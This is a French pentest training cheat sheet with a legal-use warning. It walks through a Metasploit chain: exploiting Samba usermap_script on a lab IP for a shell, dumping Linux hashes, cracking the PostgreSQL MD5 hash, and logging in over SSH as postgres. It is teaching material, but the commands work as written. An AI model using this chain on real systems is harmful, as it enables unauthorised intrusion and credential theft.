Postgre password metasploit
🔒 Contenu de sécurité — usage encadré
Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).
Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.
| Fiche express | |
|---|---|
| Domaine | Post-exploitation Linux |
| Objectif | Récupérer et casser un hash PostgreSQL |
| Vecteur | Samba usermap_script
|
| Voir aussi | Postgres login · Postgres metasploit |
Enchaînement : obtenir un shell via la faille Samba usermap_script, récupérer les hashs locaux, puis casser le hash MD5 PostgreSQL pour se connecter en SSH avec le compte postgres.
Obtenir une session
msfconsole
use exploit/multi/samba/usermap_script
set RHOST 192.168.0.196
exploit
sessions
Récupérer les hashs
use post/linux/gather/hashdump
show options
set SESSION 1
exploit
Casser le hash MD5 PostgreSQL
use auxiliary/analyze/postgres_md5_crack
show options
exploit
Puis connexion avec le compte récupéré :
ssh postgres@192.168.0.x
Voir aussi
- Postgres login — force brute des identifiants PostgreSQL
- Postgres metasploit — configuration de la base Metasploit